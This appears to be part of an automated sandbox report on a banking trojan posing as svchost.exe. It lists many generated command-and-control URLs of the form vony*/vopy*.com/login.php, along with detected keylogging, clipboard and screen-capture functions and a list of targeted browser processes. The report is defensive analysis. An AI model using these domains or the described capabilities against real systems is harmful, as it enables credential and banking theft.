    Source: svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1701312723.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1798156248.0000000002959000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2664198427.000000000615D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1728166475.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720674945.0000000002953000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volykyc.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volypum.com/login.php
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418399086.00000000060CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2664198427.000000000615D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654592371.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2574575216.00000000029D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyqat.com/login.php
    Source: svchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609566832.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyquk.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885927315.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyrac.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650532264.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051811464.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648460098.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyrut.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609355192.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1607712523.0000000006035000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyzef.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyzic.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonybat.com/login.php
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonycum.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjim.com/login.php
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjuc.com/login.php
    Source: svchost.exe, 00000002.00000003.1550239524.00000000029FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1549704357.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550752582.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550034338.000000000B458000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824832708.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546749994.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1829965352.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546693862.000000000B457000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymuf.com/login.php
    Source: svchost.exe, 00000002.00000003.1550239524.00000000029FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymuf.com/login.phpcom/login.php
    Source: svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2664198427.000000000615D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypom.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106093549.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090770576.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2091016673.0000000002956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqof.com/login.php
    Source: svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqof.com/login.phpc
    Source: svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1552047254.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799982430.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1550101575.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqok.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461020987.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467659366.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1481907291.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533832899.000000000B457000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460237443.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459941398.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1467589807.000000000B456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1460968957.000000000B456000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyryc.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyryc.com/login.phpg
    Source: svchost.exe, 00000002.00000003.1590675413.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609566832.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzac.com/login.php
    Source: svchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1720322684.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719755728.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558340925.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653164909.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719650590.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558824372.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559076689.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2558638805.0000000002956000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2559887806.0000000002956000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzuf.com/login.php
    Source: svchost.exe, 00000002.00000003.1700442233.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648375447.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417918373.000000000612C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopybyt.com/
    Source: svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447172965.000000000600D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418399086.00000000060CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1418952774.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopybyt.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658175800.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660127068.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2086194667.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopycoc.com/login.php
    Source: svchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1531530033.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1461020987.000000000600B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534189667.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopycom.com/login.php
    Source: svchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2067567385.000000000602A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyguk.com/login.php
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyjuf.com/login.php
    Source: svchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812525410.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1812522672.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824832708.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1546749994.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1829965352.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850188368.00000000008A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopykak.com/login.php
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669888857.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyput.com/login.php
    Source: svchost.exe, 00000002.00000003.1841502213.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841504956.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyqim.com/
    Source: svchost.exe, 00000002.00000003.1841502213.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841504956.00000000029C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyqim.com/PWD
    Source: svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyqim.com/login.php
    Source: svchost.exe, 00000002.00000003.1820622823.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1820638781.00000000060FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyret.com/
    Source: svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2653631419.0000000002977000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzyk.com/login.php

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    Source: C:\Windows\apppatch\svchost.exe Code function: [tab] 2_2_02BC2F40
    Source: C:\Windows\apppatch\svchost.exe Code function: [del] 2_2_02BC2F40
    Source: C:\Windows\apppatch\svchost.exe Code function: [ins] 2_2_02BC2F40
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BC3220 memset,GlobalLock,GetCurrentThreadId,GetGUIThreadInfo,GetOpenClipboardWindow,GetActiveWindow,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GlobalUnlock,GlobalUnlock, 2_2_02BC3220
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BB9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 2_2_02BB9530
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 5_2_008D9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 5_2_008D9530
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 6_2_00889530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 6_2_00889530
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe Code function: 9_2_02BD9530 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard, 9_2_02BD9530
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BD54A0 Sleep,_snprintf,GetDesktopWindow,GetWindowDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,ReleaseDC, 2_2_02BD54A0
    Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02BC2F40 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii, 2_2_02BC2F40

    E-Banking Fraud

    Source: C:\Windows\apppatch\svchost.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex2_2_02BC78A0
